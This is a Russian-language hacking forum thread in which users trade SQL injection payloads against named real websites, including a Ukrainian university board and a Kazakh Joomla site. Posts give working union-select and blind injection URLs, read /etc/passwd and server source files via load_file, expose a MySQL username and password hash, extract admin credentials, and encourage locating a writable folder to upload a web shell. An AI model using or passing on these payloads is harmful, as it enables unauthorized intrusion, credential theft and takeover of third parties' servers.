Подскажите, есть инъекции или нет.. непойму, вроде все "признаки" указывают на скулю, а вот что тто даже рабочие поля выявить не получается Code: http://smartlip.com/symbian/fileshare/flist.php?cat=1' Code: http://smartlip.com/adv/?id=1' Заранее, спасибо!
http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--%20%201 слепая скул
Доброе время суток! Кто можеть подсказать как юзать скул ошибку! Дело было так я использовал эксплойт для определение верси с античат с темы:Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов Вот сам так скажем эксплойт И когда я использовал эксплойт то пройжошла мускул ошибка! Как можно юзать эту мускул ошибку ! Какие сценари можео выполнять с помощью этой ошибки! Версия самого движка 5.2.1 Зарание всем спосибо!
Спасибо! Не подскажите, если вы пользовались прогой Marathon Tool (как раз для blind-SQL), то там в поле "Target base URL" нужно вводить просто http://smartlip.com/symbian/fileshare/flist.php?cat=1 или http://smartlip.com/symbian/fileshare/flist.php?cat=-1' ? А то что то я вручную найти таблицы не смог, да и прога почему то не хочет Для определения БД пробовал такие варианты: Code: http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)>1--%20%201 http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)<5--%20%201 http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)=5--%20%201 И во всех результатах ничего не выводится, точнее ошибок не выводится..
http://kpi.ua/board/index.php?action=list_messages§ion_id=-1+union+select+concat_ws(0x2f,name,pwd)+from+document.nuke_authors+limit+0,1-- http://kpi.ua/board/index.php?action=list_messages§ion_id=-1+union+select+load_file(0x2F6574632F706173737764)--
2 Tigger: http://kpi.ua/board/index.php?action=list_messages§ion_id=2&module=1' mysql user: hellcat ------- mysql password: *155D9B0E48F5A1A1981B225E4C8D9C2A2A87E608 ------- file_priv: Y
mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/
http://kpi.ua/job/index.php?action=list_messages§ion_id=-3+union+select+load_file('/usr/hosting/www.ntu-kpi.kiev.ua/data/common/include-board/Query.class')/* какой же это бред? ...повезло..даже ковычГи проходят...исчи папку для записи..и го шелл...
Подскажите, как такую SQL- инъекцию раскрутить: Не получается подобрать кол-во полей, все время ошибка вылазит..
Доброе время суток! Что можно с этим сделать есть скул иньекция на этом сайте ! Движок jomla версия помоему либо 1.1 либо 5.2.1 http://aing.kz/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_sum=[sql] Кто может помочь как залить шел или что-то плиз помогите! А еше забыл еше отметить вход админ ку можно через http://aing.kz/administrator Заранее спасибо!
